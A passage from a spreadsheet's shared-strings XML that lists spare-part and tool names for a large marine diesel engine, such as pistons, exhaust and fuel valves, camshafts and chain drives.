  <si>
    <t>LIFTING TOOL FOR PISTON</t>
  </si>
  <si>
    <t>CLAW FOR PISTON LIFT.TOOL</t>
  </si>
  <si>
    <t>GUIDE RING F. PISTON</t>
  </si>
  <si>
    <t>GUIDE SCREW, PISTON CROWN</t>
  </si>
  <si>
    <t>TEMPLATE-PISTON TOP</t>
  </si>
  <si>
    <t>LIFT.TOOL-COOLING INSERT</t>
  </si>
  <si>
    <t>PISTON RING EXPANDER</t>
  </si>
  <si>
    <t>GUIDE RING FOR PISTON</t>
  </si>
  <si>
    <t>SEGMENT</t>
  </si>
  <si>
    <t>CLAW, PIST.RING EXPANDER</t>
  </si>
  <si>
    <t>DISMTL.SCREW-PISTON SKIRT</t>
  </si>
  <si>
    <t>SUPPORT F. TILTING TOOL</t>
  </si>
  <si>
    <t>SUSPENSION TOOL F. PISTON</t>
  </si>
  <si>
    <t>EXT.STUD, SUSP. PISTON</t>
  </si>
  <si>
    <t>LIFT./PRESS.TEST TOOL</t>
  </si>
  <si>
    <t>PULLING TOOL,STUFFING BOX</t>
  </si>
  <si>
    <t>MEASUR.TOOLS-RING GROOVE</t>
  </si>
  <si>
    <t>ELTRON.UNIT-PISTON ALIGN.</t>
  </si>
  <si>
    <t>RETAINING RING FOR BORING</t>
  </si>
  <si>
    <t>PISTON (CLEARANCE)</t>
  </si>
  <si>
    <t>PISTON PIN COMPLETE</t>
  </si>
  <si>
    <t>REMACHINING OF PISTON</t>
  </si>
  <si>
    <t>MEASUR.TOOLS F.RINGGROOVE</t>
  </si>
  <si>
    <t>PISTON, ONE PART</t>
  </si>
  <si>
    <t>MOUNT. OF PISTON RING</t>
  </si>
  <si>
    <t>OIL LEAD PIPE</t>
  </si>
  <si>
    <t>GUIDE FOR PISTON</t>
  </si>
  <si>
    <t>PISTON COMP. F. FLAMERING</t>
  </si>
  <si>
    <t>PISTON (FOR FLAMERING)</t>
  </si>
  <si>
    <t>MOUNT. PISTON W/CONN. ROD</t>
  </si>
  <si>
    <t>CYLINDER UNIT, COMPL.</t>
  </si>
  <si>
    <t>CYLINDER UNIT</t>
  </si>
  <si>
    <t>CYLINDER COMPLETE</t>
  </si>
  <si>
    <t>TEST, PISTON COOLING</t>
  </si>
  <si>
    <t>BEND, PISTON COOLING</t>
  </si>
  <si>
    <t>PIPE PIECE</t>
  </si>
  <si>
    <t>TELESCOPIC PIPE</t>
  </si>
  <si>
    <t>SLIT PIPE</t>
  </si>
  <si>
    <t>DOWN PIPE</t>
  </si>
  <si>
    <t>PIPE HOLDER</t>
  </si>
  <si>
    <t>DISTANCE TUBE</t>
  </si>
  <si>
    <t>TIGHTN.TEMPL.,OILINL.BEND</t>
  </si>
  <si>
    <t>EXHAUST VALVE HOUSING</t>
  </si>
  <si>
    <t>DOG</t>
  </si>
  <si>
    <t>AIR INTAKE VALVE</t>
  </si>
  <si>
    <t>BOTTOM PIECE</t>
  </si>
  <si>
    <t>SPACER RING</t>
  </si>
  <si>
    <t>AIR CYLINDER</t>
  </si>
  <si>
    <t>ROD.LIFT-ROTATION CHECK</t>
  </si>
  <si>
    <t>EXH.VALVE HOUSING-UPPER</t>
  </si>
  <si>
    <t>EXH.VALVE HOUSING-LOWER</t>
  </si>
  <si>
    <t>EXH.VALVE HOUSING-HOTDUCT</t>
  </si>
  <si>
    <t>EXH.VALVE HOUSING-COOLER</t>
  </si>
  <si>
    <t>LINER-PISTON</t>
  </si>
  <si>
    <t>OIL CYLINDER</t>
  </si>
  <si>
    <t>LINER-OIL CYL.</t>
  </si>
  <si>
    <t>DISTANCE TUBE F.EXH.VALVE</t>
  </si>
  <si>
    <t>SPRING SCREW</t>
  </si>
  <si>
    <t>ADAPTER DISC</t>
  </si>
  <si>
    <t>FLANGE F. OIL CYLINDER</t>
  </si>
  <si>
    <t>STAY BOLT LINER</t>
  </si>
  <si>
    <t>INSULATION EXH.V. HOUSING</t>
  </si>
  <si>
    <t>SPRING THRUST PIECE</t>
  </si>
  <si>
    <t>HUB-FLAME GUARD</t>
  </si>
  <si>
    <t>PULL DISC</t>
  </si>
  <si>
    <t>SECURING RING</t>
  </si>
  <si>
    <t>VANE</t>
  </si>
  <si>
    <t>VANE WHEEL</t>
  </si>
  <si>
    <t>GEARWHEEL</t>
  </si>
  <si>
    <t>BUSHING TEMP.MEASURMENT</t>
  </si>
  <si>
    <t>SPINDLE TEMP. MEASUREMENT</t>
  </si>
  <si>
    <t>SPINDLE GUIDE-UPPER</t>
  </si>
  <si>
    <t>SPINDLE GUIDE COMPLETE</t>
  </si>
  <si>
    <t>BUSHING,SPINDLE GUIDE UP.</t>
  </si>
  <si>
    <t>BUSHING,SPINDLE GUIDE LOW</t>
  </si>
  <si>
    <t>BUSHING,EXH.VALVE SPINDLE</t>
  </si>
  <si>
    <t>FLANGE FOR SEALING RING</t>
  </si>
  <si>
    <t>BLANK-INTERMEDIATE DISC</t>
  </si>
  <si>
    <t>SIDE PLATE WITH FORK</t>
  </si>
  <si>
    <t>SIDE PLATE WITHOUT FORK</t>
  </si>
  <si>
    <t>PULL ROD, SPRING GUIDE</t>
  </si>
  <si>
    <t>SHAFT PIN FOR PULL ROD</t>
  </si>
  <si>
    <t>BEARING SPRING TRAVERSE</t>
  </si>
  <si>
    <t>CROSS MEMBER</t>
  </si>
  <si>
    <t>HOUSING, CONTROL OIL</t>
  </si>
  <si>
    <t>SLIDE</t>
  </si>
  <si>
    <t>GUIDE SCREW FOR SPINDLE</t>
  </si>
  <si>
    <t>PLATE, CONTROL OIL</t>
  </si>
  <si>
    <t>ACTUATOR CYLINDER</t>
  </si>
  <si>
    <t>ACTUATOR PISTON, OUTER</t>
  </si>
  <si>
    <t>ACTUATOR PISTON, INNER</t>
  </si>
  <si>
    <t>HOUS.F.FLOW CLEAN. N.R.V.</t>
  </si>
  <si>
    <t>ACTUATOR COVER</t>
  </si>
  <si>
    <t>ACTUATOR HOUSE</t>
  </si>
  <si>
    <t>MEASURING CONE</t>
  </si>
  <si>
    <t>CYLINDER F CLEARANCE CONT</t>
  </si>
  <si>
    <t>INLET + EXH.VALVE SPRING</t>
  </si>
  <si>
    <t>LINER</t>
  </si>
  <si>
    <t>SEALING RING F.VALVE STEM</t>
  </si>
  <si>
    <t>SEALING RING FOR PISTON</t>
  </si>
  <si>
    <t>CONICAL RING 2/2</t>
  </si>
  <si>
    <t>INLET VALVE</t>
  </si>
  <si>
    <t>VALVE SPINDLE GUIDE</t>
  </si>
  <si>
    <t>BRACKET-MOUNT.TOOL</t>
  </si>
  <si>
    <t>LIFT.TOOL F.EXHAUST VALVE</t>
  </si>
  <si>
    <t>GAUGE EXH.V.BOTTOM PIECE</t>
  </si>
  <si>
    <t>GAUGE-EXH.VALVE SEATING</t>
  </si>
  <si>
    <t>GAUGE, EXH. VALVE SPINDLE</t>
  </si>
  <si>
    <t>CONE RING, PNEUM. PISTON</t>
  </si>
  <si>
    <t>GRIND.RING-EXH.V.BOTTOM P</t>
  </si>
  <si>
    <t>TOOL,EMERG.OPEN EXH.VALVE</t>
  </si>
  <si>
    <t>GRINDING RING, EXH. VALVE</t>
  </si>
  <si>
    <t>BUSHING FOR PULL ROD</t>
  </si>
  <si>
    <t>SPRING</t>
  </si>
  <si>
    <t>SETTING SCREW</t>
  </si>
  <si>
    <t>VALVE CONE WITH WING BUSH</t>
  </si>
  <si>
    <t>VALVE CONE</t>
  </si>
  <si>
    <t>WING BUSH BLANK</t>
  </si>
  <si>
    <t>WING BUSH</t>
  </si>
  <si>
    <t>BALL BEARING</t>
  </si>
  <si>
    <t>HARD METAL LAYER</t>
  </si>
  <si>
    <t>ROTOCAP</t>
  </si>
  <si>
    <t>SPRING PLATE</t>
  </si>
  <si>
    <t>PRESSURE PIECE</t>
  </si>
  <si>
    <t>AXIAL BEARING</t>
  </si>
  <si>
    <t>VALVE CONE PIECE</t>
  </si>
  <si>
    <t>WEAR AND TEAR SET</t>
  </si>
  <si>
    <t>VALVE COMPL.</t>
  </si>
  <si>
    <t>NECK RING</t>
  </si>
  <si>
    <t>VALVE BRIDGE</t>
  </si>
  <si>
    <t>VALVE BRIDGE LEFT</t>
  </si>
  <si>
    <t>VALVE BRIDGE RIGHT</t>
  </si>
  <si>
    <t>BALL GUIDE</t>
  </si>
  <si>
    <t>THRUST SCREW</t>
  </si>
  <si>
    <t>VALVE GEAR</t>
  </si>
  <si>
    <t>VALVE MOUNTING</t>
  </si>
  <si>
    <t>HYDRAULIC CYLINDER UNIT</t>
  </si>
  <si>
    <t>DISTRIBUTOR BLOCK</t>
  </si>
  <si>
    <t>RETURN OIL STANDPIPE</t>
  </si>
  <si>
    <t>HYDRAULIC EXH. ACTUATOR</t>
  </si>
  <si>
    <t>OIL CYLINDER,BOTTOM PIECE</t>
  </si>
  <si>
    <t>OIL CYLINDER,MIDDLE PIECE</t>
  </si>
  <si>
    <t>OIL CYLINDER,TOP PIECE</t>
  </si>
  <si>
    <t>PISTON,STEP1 OIL CYLINDER</t>
  </si>
  <si>
    <t>PISTON,STEP2 OIL CYLINDER</t>
  </si>
  <si>
    <t>OIL CYLINDER, ONE PIECE</t>
  </si>
  <si>
    <t>GUIDE BUSHING,OILCYLINDER</t>
  </si>
  <si>
    <t>HYDRAULIC FUEL PUMP</t>
  </si>
  <si>
    <t>TOP COVER COMPLETE</t>
  </si>
  <si>
    <t>FUEL PLUNGER</t>
  </si>
  <si>
    <t>PUMP BARREL</t>
  </si>
  <si>
    <t>HYDRAULIC PLUNGER</t>
  </si>
  <si>
    <t>FLANGE, PLUG VALVE</t>
  </si>
  <si>
    <t>THRUST PIECE, PLUG VALVE</t>
  </si>
  <si>
    <t>CLEAN. TOOL, ON/OFF VALVE</t>
  </si>
  <si>
    <t>CLEANING TOOL, NC VALVE</t>
  </si>
  <si>
    <t>WATER ACCUMULATOR</t>
  </si>
  <si>
    <t>PILOT OIL ACCUMULATOR</t>
  </si>
  <si>
    <t>BASE</t>
  </si>
  <si>
    <t>WATER INJEKTION VALVE</t>
  </si>
  <si>
    <t>NON-RETURN VALVE</t>
  </si>
  <si>
    <t>HEAD,WATER INS. VALVE</t>
  </si>
  <si>
    <t>TRUST PIECE</t>
  </si>
  <si>
    <t>GAS CONTROL BLOCK</t>
  </si>
  <si>
    <t>THRUST BUSHING</t>
  </si>
  <si>
    <t>THRUST DISC</t>
  </si>
  <si>
    <t>FUEL VALVE</t>
  </si>
  <si>
    <t>BLANK, FUEL VALVE</t>
  </si>
  <si>
    <t>FUEL VALVE HOUSING</t>
  </si>
  <si>
    <t>FUEL VALVE HEAD</t>
  </si>
  <si>
    <t>BLANK, FUEL VALVE HOUSING</t>
  </si>
  <si>
    <t>PIPE-THRUST SPINDLE</t>
  </si>
  <si>
    <t>PACKING FOR FUEL VALVE</t>
  </si>
  <si>
    <t>FOOT</t>
  </si>
  <si>
    <t>BLANK FOR THRUST PIECE</t>
  </si>
  <si>
    <t>BLANK F FOOT SPRING GUIDE</t>
  </si>
  <si>
    <t>SPINDLE GUIDE+FUEL NOZZLE</t>
  </si>
  <si>
    <t>FUEL NOZZLE, DUMMY</t>
  </si>
  <si>
    <t>FUEL NOZZLE, BLANK</t>
  </si>
  <si>
    <t>CUT-OFF SLIDE</t>
  </si>
  <si>
    <t>CUT-OFF SHAFT</t>
  </si>
  <si>
    <t>CUT-OFF PIPE</t>
  </si>
  <si>
    <t>HP. PIPE CONNECTION</t>
  </si>
  <si>
    <t>BLANK FOR SPINDLE</t>
  </si>
  <si>
    <t>NEEDLE FOR SPINDLE</t>
  </si>
  <si>
    <t>INSULATING BUSHING</t>
  </si>
  <si>
    <t>SLIDE BUSH</t>
  </si>
  <si>
    <t>SLIDE SHAFT</t>
  </si>
  <si>
    <t>HOLDER,FUEL NOZZLE COMPL.</t>
  </si>
  <si>
    <t>HOLDER, FUEL NOZZLE</t>
  </si>
  <si>
    <t>WEDGE-FUEL NOZZLE</t>
  </si>
  <si>
    <t>FUEL NOZZLE, CAP</t>
  </si>
  <si>
    <t>BOTTOM PIECE, HOLDER</t>
  </si>
  <si>
    <t>TOOL F.SOLDERING OF SLIDE</t>
  </si>
  <si>
    <t>PIPE JACKET</t>
  </si>
  <si>
    <t>GUIDE DISC</t>
  </si>
  <si>
    <t>FUEL NOZZLE,SEMI-MANUFACT</t>
  </si>
  <si>
    <t>FUEL NOZZLE</t>
  </si>
  <si>
    <t>FUEL NOZZLE, DRILLING</t>
  </si>
  <si>
    <t>PLUG-NOZZLE</t>
  </si>
  <si>
    <t>SLIT FILTER</t>
  </si>
  <si>
    <t>NON-RETURN VALVE DUMMY</t>
  </si>
  <si>
    <t>VENT SLIDE</t>
  </si>
  <si>
    <t>SLIT FILTER-BLANK</t>
  </si>
  <si>
    <t>SEAT FOR FLAP</t>
  </si>
  <si>
    <t>FEELER PIN</t>
  </si>
  <si>
    <t>INSTR. F.VALVE SPINDLE G.</t>
  </si>
  <si>
    <t>GRIND.RING-UNION NUT SEAT</t>
  </si>
  <si>
    <t>PRESSURE TESTING PUMP</t>
  </si>
  <si>
    <t>JET CONTROL SCREEN</t>
  </si>
  <si>
    <t>DRIFT-SPINDLE GUIDE</t>
  </si>
  <si>
    <t>DRIFT-NON RETURN VALVE</t>
  </si>
  <si>
    <t>FLANGE-DISM.-NON RETURN V</t>
  </si>
  <si>
    <t>ASSEMBLING TOOLS</t>
  </si>
  <si>
    <t>TOOL FOR CONE</t>
  </si>
  <si>
    <t>DUMMY,FUEL VALVE JET TEST</t>
  </si>
  <si>
    <t>TEST RIG-FUEL OIL VALVE</t>
  </si>
  <si>
    <t>GUIDE FOR TEST RIG</t>
  </si>
  <si>
    <t>CLEANING TOOL,FUEL NOZZLE</t>
  </si>
  <si>
    <t>DISM.LEVER FOR FUEL VALVE</t>
  </si>
  <si>
    <t>GRIND.MANDREL-HOLDER-OUTS</t>
  </si>
  <si>
    <t>GRIND.MANDREL-HOLDER-INSI</t>
  </si>
  <si>
    <t>GRIND.MANDREL-VALVE HEAD</t>
  </si>
  <si>
    <t>GRIND.MANDREL F.THR.SPIN.</t>
  </si>
  <si>
    <t>EXTRACTOR FOR FUEL VALVE</t>
  </si>
  <si>
    <t>TOOLS</t>
  </si>
  <si>
    <t>EXTRACTOR FOR ATOMIZER</t>
  </si>
  <si>
    <t>DRIFT FOR ATOMIZER</t>
  </si>
  <si>
    <t>FUEL INJECTOR</t>
  </si>
  <si>
    <t>ATOMIZER</t>
  </si>
  <si>
    <t>ATOMIZER HOLDER</t>
  </si>
  <si>
    <t>SPRING WASHER</t>
  </si>
  <si>
    <t>INJECTOR BODY SPARE PART</t>
  </si>
  <si>
    <t>INJECTOR BODY</t>
  </si>
  <si>
    <t>PRECHAMBER MOUNT.</t>
  </si>
  <si>
    <t>PRECHAMBER</t>
  </si>
  <si>
    <t>HOUSING-FUEL GAS VALVE</t>
  </si>
  <si>
    <t>HEAD,FUEL GAS VALVE</t>
  </si>
  <si>
    <t>UNION NIPPLE</t>
  </si>
  <si>
    <t>DISK</t>
  </si>
  <si>
    <t>GAS NOZZLE, DRILLING</t>
  </si>
  <si>
    <t>STARTING VALVE</t>
  </si>
  <si>
    <t>SCREWED CONNECTION</t>
  </si>
  <si>
    <t>VALVE HOUSING-LOWER PART</t>
  </si>
  <si>
    <t>VALVE HOUSING-UPPER PART</t>
  </si>
  <si>
    <t>HOLDER-ON</t>
  </si>
  <si>
    <t>SHUT-OFF PIECE</t>
  </si>
  <si>
    <t>SPINDLE RING</t>
  </si>
  <si>
    <t>GRIND.MANDREL-ST.VALVE</t>
  </si>
  <si>
    <t>MANTLE FOR SAFETY CAP</t>
  </si>
  <si>
    <t>GRINDING RING-START.VALVE</t>
  </si>
  <si>
    <t>TIGHTENING TEMPL.-START.V</t>
  </si>
  <si>
    <t>MANDREL F.ASSEMBL.ST.VAL.</t>
  </si>
  <si>
    <t>VALVE FLAP</t>
  </si>
  <si>
    <t>ADAPTING RING</t>
  </si>
  <si>
    <t>BLOCK</t>
  </si>
  <si>
    <t>HOUSING FOR TOOLS</t>
  </si>
  <si>
    <t>BALL</t>
  </si>
  <si>
    <t>COACH BOLT</t>
  </si>
  <si>
    <t>HOUSING FOR SAFETY VALVE</t>
  </si>
  <si>
    <t>VALVE FLAP F.SAFETY VALVE</t>
  </si>
  <si>
    <t>CONN. PIECE W. INDICATOR</t>
  </si>
  <si>
    <t>LOCK NUT FOR SAFETY VALVE</t>
  </si>
  <si>
    <t>CAP NUT FOR SAFTEY VALVE</t>
  </si>
  <si>
    <t>SAFETY V.-SPARE PART LIST</t>
  </si>
  <si>
    <t>THRUST PIN</t>
  </si>
  <si>
    <t>ROCKER ARM BLANK</t>
  </si>
  <si>
    <t>BALL THRUST PIECE</t>
  </si>
  <si>
    <t>ROCKER ARM BRACKET</t>
  </si>
  <si>
    <t>ROCKER ARM SHAFT</t>
  </si>
  <si>
    <t>CONTROL OIL H.P.-PIPE</t>
  </si>
  <si>
    <t>GUIDE-THRUST PIECE</t>
  </si>
  <si>
    <t>SHAFT-ROCKER ARM</t>
  </si>
  <si>
    <t>BUSHING-ROCKER ARM</t>
  </si>
  <si>
    <t>THRUST FOOT</t>
  </si>
  <si>
    <t>GREASE</t>
  </si>
  <si>
    <t>ROLLER GUIDE</t>
  </si>
  <si>
    <t>SHAFT PIN FOR ROLLER</t>
  </si>
  <si>
    <t>SHAFT PIN FOR REVERSING</t>
  </si>
  <si>
    <t>HELICAL SPRING</t>
  </si>
  <si>
    <t>LOCK RING</t>
  </si>
  <si>
    <t>RING IN 2 PARTS</t>
  </si>
  <si>
    <t>TOP PIECE</t>
  </si>
  <si>
    <t>THRUST FLANGE</t>
  </si>
  <si>
    <t>SKIRT FOR OIL CYLINDER</t>
  </si>
  <si>
    <t>PISTON, VALVE GEAR</t>
  </si>
  <si>
    <t>REGULATING SCREW</t>
  </si>
  <si>
    <t>PISTON, PUNCTURE VALVE</t>
  </si>
  <si>
    <t>PRESSURE CYLINDER</t>
  </si>
  <si>
    <t>PISTON,CLEARANCE ABSORBER</t>
  </si>
  <si>
    <t>PUSH ROD SHIELD</t>
  </si>
  <si>
    <t>PUSH ROD TUBE</t>
  </si>
  <si>
    <t>ROLLER GUIDE BUSHING</t>
  </si>
  <si>
    <t>ROCKER ARM-BLANK</t>
  </si>
  <si>
    <t>TIGHTN.TEMPL.,ACTUATOR</t>
  </si>
  <si>
    <t>GRINDING MANDREL-H.P.PIPE</t>
  </si>
  <si>
    <t>GUIDE F GRINDING MANDREL</t>
  </si>
  <si>
    <t>MEASURING TOOLS</t>
  </si>
  <si>
    <t>PIPE FOR PUSH ROD</t>
  </si>
  <si>
    <t>ROLLER GUIDE FOR VALVE</t>
  </si>
  <si>
    <t>STUD, ROLLER</t>
  </si>
  <si>
    <t>GEAR F. VALVES AND PUMP</t>
  </si>
  <si>
    <t>HOUSING FOR ROLLER GUIDE</t>
  </si>
  <si>
    <t>L.O. PIPE F. ROLLER GUIDE</t>
  </si>
  <si>
    <t>PUSH ROD SLEEVE</t>
  </si>
  <si>
    <t>REPAIR*SOLUTION</t>
  </si>
  <si>
    <t>ROLLER GUIDE FOR PUMP</t>
  </si>
  <si>
    <t>HEXAGON SCREW</t>
  </si>
  <si>
    <t>GEAR FOR VALVES</t>
  </si>
  <si>
    <t>ARR.ROLLER GUIDE F.VALVES</t>
  </si>
  <si>
    <t>VALVE THRUST PIECE</t>
  </si>
  <si>
    <t>OVERFLOW VALVE HOUSING</t>
  </si>
  <si>
    <t>GUIDE BUSHNING</t>
  </si>
  <si>
    <t>CONTROL OIL PUMP HOUSING</t>
  </si>
  <si>
    <t>NUT FOR STAY</t>
  </si>
  <si>
    <t>OVERFLOW PIPE</t>
  </si>
  <si>
    <t>CAMSHAFT, FORE</t>
  </si>
  <si>
    <t>CAMSHAFT, AFT</t>
  </si>
  <si>
    <t>CAMSHAFT WITH MATCH-MARK</t>
  </si>
  <si>
    <t>LOCK SCREW</t>
  </si>
  <si>
    <t>BEARING BUSHING</t>
  </si>
  <si>
    <t>HELICAL GEAR WHEEL</t>
  </si>
  <si>
    <t>COUPLING-SKF</t>
  </si>
  <si>
    <t>HOLSET DAMPER</t>
  </si>
  <si>
    <t>SHAFT FOR CHAINWHEEL</t>
  </si>
  <si>
    <t>SHAFT PIN</t>
  </si>
  <si>
    <t>CAMSHAFT SECTIONS</t>
  </si>
  <si>
    <t>VALVE OPENING DIAGRAM</t>
  </si>
  <si>
    <t>CAMSHAFT FORE</t>
  </si>
  <si>
    <t>BLANK FOR CAMSHAFT</t>
  </si>
  <si>
    <t>CAMSHAFT INTERMEDIATE</t>
  </si>
  <si>
    <t>CAMSHAFT INTERM./AFTER</t>
  </si>
  <si>
    <t>CAMSHAFT AFTER</t>
  </si>
  <si>
    <t>TEMPLATE - INLET CAMS.</t>
  </si>
  <si>
    <t>TEMPLATE -EXHAUST CAMS.</t>
  </si>
  <si>
    <t>TEMPLATE FUEL CAM</t>
  </si>
  <si>
    <t>CAM. TOLERANCES</t>
  </si>
  <si>
    <t>TEMPLATE - EXHAUST CAM</t>
  </si>
  <si>
    <t>IMPULS WHEEL</t>
  </si>
  <si>
    <t>HYDR.TOOLS-CAM DISC</t>
  </si>
  <si>
    <t>HYDR.TOOLS-COUPLING</t>
  </si>
  <si>
    <t>ADJUSTING GAUGE</t>
  </si>
  <si>
    <t>CAMSHAFT ADJUSTING TOOL</t>
  </si>
  <si>
    <t>FACE IMPACT WRENCH, CAMS.</t>
  </si>
  <si>
    <t>STAND(DISMOUNT CAMSHAFT)</t>
  </si>
  <si>
    <t>IMPACT WRENCH, FUEL CAM</t>
  </si>
  <si>
    <t>PIN GAUGE FOR CAMSHAFT</t>
  </si>
  <si>
    <t>SHAFT FOR CAMSHAFT</t>
  </si>
  <si>
    <t>MATERIAL AND HARDENING</t>
  </si>
  <si>
    <t>COUPLING PART</t>
  </si>
  <si>
    <t>GEARWHEEL FOR CAMSHAFT</t>
  </si>
  <si>
    <t>CAMSHAFT INTERMEDIATE,AFT</t>
  </si>
  <si>
    <t>PLACING OF FUEL CAMS</t>
  </si>
  <si>
    <t>EXHAUST CAM</t>
  </si>
  <si>
    <t>INLET CAM</t>
  </si>
  <si>
    <t>FUEL CAM</t>
  </si>
  <si>
    <t>STARTING CAM</t>
  </si>
  <si>
    <t>GEOMETRICAL TOLERANCES</t>
  </si>
  <si>
    <t>TEMPLATE EXHAUST CAM</t>
  </si>
  <si>
    <t>TEMPLATE INLET CAM</t>
  </si>
  <si>
    <t>FUEL AND EXHAUST GEAR</t>
  </si>
  <si>
    <t>BASE PLATE</t>
  </si>
  <si>
    <t>SHAFT-PIN FOR ROLLER</t>
  </si>
  <si>
    <t>CROSSPIECE</t>
  </si>
  <si>
    <t>INVA OIL CYLINDER</t>
  </si>
  <si>
    <t>INVA BOOSTER PISTON</t>
  </si>
  <si>
    <t>INVA PISTON</t>
  </si>
  <si>
    <t>INVA BOTTON PIECE</t>
  </si>
  <si>
    <t>INVA ADJUSTER SCREW</t>
  </si>
  <si>
    <t>INVA ADJUSTER NUT</t>
  </si>
  <si>
    <t>INVA ADJUSTER TOOL</t>
  </si>
  <si>
    <t>INVA CONNECTION BLOCK</t>
  </si>
  <si>
    <t>INVA LOCKING PIN</t>
  </si>
  <si>
    <t>INVA LOCKING SCREW</t>
  </si>
  <si>
    <t>GAS SPRING HOUSE</t>
  </si>
  <si>
    <t>GAS SPRING PISTON</t>
  </si>
  <si>
    <t>GAS SPRING COVER</t>
  </si>
  <si>
    <t>FLUSHING VALVE</t>
  </si>
  <si>
    <t>ROLLER GUIDE HOUSING</t>
  </si>
  <si>
    <t>BEARING BRACKET</t>
  </si>
  <si>
    <t>ROLLER GUIDE-BLANK</t>
  </si>
  <si>
    <t>BEARING HOUSING-UPP. PART</t>
  </si>
  <si>
    <t>BEARING HOUSING-LOW. PART</t>
  </si>
  <si>
    <t>STUD FOR CAMSHAFT BEARING</t>
  </si>
  <si>
    <t>PUMP BASE</t>
  </si>
  <si>
    <t>BUSHING, ROLLER GUIDE</t>
  </si>
  <si>
    <t>WHITE METAL</t>
  </si>
  <si>
    <t>SUPPORT FOR STOP CYLINDER</t>
  </si>
  <si>
    <t>LOCKING PIN</t>
  </si>
  <si>
    <t>DISENGAGING LEVER</t>
  </si>
  <si>
    <t>CYLINDER ARM</t>
  </si>
  <si>
    <t>GUIDE BLOCK</t>
  </si>
  <si>
    <t>SUSPENSION BRACKET</t>
  </si>
  <si>
    <t>SECURING BUSH</t>
  </si>
  <si>
    <t>CAMSHAFT FRAME</t>
  </si>
  <si>
    <t>CAMSH.FRAME INTERM.SECT.</t>
  </si>
  <si>
    <t>CAMSHAFT FRAME FORE END</t>
  </si>
  <si>
    <t>CAMSHAFT FRAME AFT END</t>
  </si>
  <si>
    <t>SPRING SEAT DISK</t>
  </si>
  <si>
    <t>ARM FOR REVERSING</t>
  </si>
  <si>
    <t>LINK FOR REVERSING</t>
  </si>
  <si>
    <t>GUIDE F. REVERSING</t>
  </si>
  <si>
    <t>GUIDE SPINDLE</t>
  </si>
  <si>
    <t>FLANGE FOR AIR CYLINDER</t>
  </si>
  <si>
    <t>RECTIFIER BLOCK</t>
  </si>
  <si>
    <t>PLATE(SHAPED)</t>
  </si>
  <si>
    <t>DISTRIBUTOR BLOC</t>
  </si>
  <si>
    <t>ACCUMULATOR BLOCK</t>
  </si>
  <si>
    <t>HOLDER FOR SCRAPER RINGS</t>
  </si>
  <si>
    <t>HOLDER F.3-WAY VALVE</t>
  </si>
  <si>
    <t>SHIM FOR REVERSING CYL.</t>
  </si>
  <si>
    <t>CONSOLE</t>
  </si>
  <si>
    <t>FLANGE,ROLLER GDE.HOUSING</t>
  </si>
  <si>
    <t>SPLIT FLANGE,ROL.GDE.HSG.</t>
  </si>
  <si>
    <t>SCRAPER RING HOUSING</t>
  </si>
  <si>
    <t>CAMSHAFT SHIELD UPPER</t>
  </si>
  <si>
    <t>CAMSHAFT SHIELD LOWER</t>
  </si>
  <si>
    <t>PLATE FOR OIL PAN</t>
  </si>
  <si>
    <t>SEALING BUSH</t>
  </si>
  <si>
    <t>RETAINING FLANGE</t>
  </si>
  <si>
    <t>RETURN PIPE</t>
  </si>
  <si>
    <t>RETURN SLIDE</t>
  </si>
  <si>
    <t>BOTTOM PLUG</t>
  </si>
  <si>
    <t>CONNECTING PIPE, LUB.OIL</t>
  </si>
  <si>
    <t>REP.-ROLLER GUIDE HOUSING</t>
  </si>
  <si>
    <t>BEARING CAP</t>
  </si>
  <si>
    <t>FOOT BOARD</t>
  </si>
  <si>
    <t>INFI GLIDER</t>
  </si>
  <si>
    <t>INVA GLIDER</t>
  </si>
  <si>
    <t>INFI PLUG</t>
  </si>
  <si>
    <t>INVA PLUG</t>
  </si>
  <si>
    <t>INVA GUIDE PIN</t>
  </si>
  <si>
    <t>INFI GUIDE PIN</t>
  </si>
  <si>
    <t>KEY,LIFT.OF ROLLER GUIDE</t>
  </si>
  <si>
    <t>CAMSHAFT BEARING</t>
  </si>
  <si>
    <t>BUSH FOR CAMSHAFT BEARING</t>
  </si>
  <si>
    <t>GEARWHEEL, CRANKSHAFT</t>
  </si>
  <si>
    <t>INTERMEDIATE SHAFT</t>
  </si>
  <si>
    <t>BEARING F. INTERM. SHAFT</t>
  </si>
  <si>
    <t>CONNECTING FLANGE</t>
  </si>
  <si>
    <t>BEARING, DRIVE SHAFT</t>
  </si>
  <si>
    <t>GEARWHEEL, DRIVE SHAFT</t>
  </si>
  <si>
    <t>SHEAR NUT</t>
  </si>
  <si>
    <t>LUB. OIL PIPE</t>
  </si>
  <si>
    <t>LOW PRESS. HYDR. OIL PIPE</t>
  </si>
  <si>
    <t>H.P. SAFETY VALVE BLOCK</t>
  </si>
  <si>
    <t>CHAIN WHEEL</t>
  </si>
  <si>
    <t>HUB-REVERSING MECHANISM</t>
  </si>
  <si>
    <t>BLOCK BEARING F.REV.CRANK</t>
  </si>
  <si>
    <t>HUB FOR BRAKE DISC</t>
  </si>
  <si>
    <t>BRAKE DISC</t>
  </si>
  <si>
    <t>SLEEVE WITH CAM</t>
  </si>
  <si>
    <t>SLIDING SLEEVE</t>
  </si>
  <si>
    <t>NUT, SLIDE</t>
  </si>
  <si>
    <t>REVERSING CRANK</t>
  </si>
  <si>
    <t>SPRING STOP</t>
  </si>
  <si>
    <t>ROTARY VANE</t>
  </si>
  <si>
    <t>SEALING STRIP</t>
  </si>
  <si>
    <t>SHRINK RING</t>
  </si>
  <si>
    <t>FLEXIBLE SHAFT</t>
  </si>
  <si>
    <t>DRIVING STUD</t>
  </si>
  <si>
    <t>CHAIN TIGHTENER WHEEL</t>
  </si>
  <si>
    <t>GUIDE NUT</t>
  </si>
  <si>
    <t>TIGHTENING BOLT</t>
  </si>
  <si>
    <t>SHAFT F. TIGHTENING BOLT</t>
  </si>
  <si>
    <t>FLANGE BEARING</t>
  </si>
  <si>
    <t>SHAFT F. CHAIN WHEEL</t>
  </si>
  <si>
    <t>DATA PLATE FOR SPRING</t>
  </si>
  <si>
    <t>SUPPL.FOR CHAIN TIGHTENER</t>
  </si>
  <si>
    <t>BEAM FOR GUIDEBAR</t>
  </si>
  <si>
    <t>BRACKET FOR GUIDEWAY</t>
  </si>
  <si>
    <t>GUIDEBAR</t>
  </si>
  <si>
    <t>CHAIN WHEEL-CRANKSHAFT</t>
  </si>
  <si>
    <t>CHAIN WHEEL-BLANK</t>
  </si>
  <si>
    <t>GEAR BOX</t>
  </si>
  <si>
    <t>SHAFT FOR IDLERS</t>
  </si>
  <si>
    <t>CHAIN TIGHTENER ECCENTRIC</t>
  </si>
  <si>
    <t>WEIGHT</t>
  </si>
  <si>
    <t>ADJUSTING PIECE</t>
  </si>
  <si>
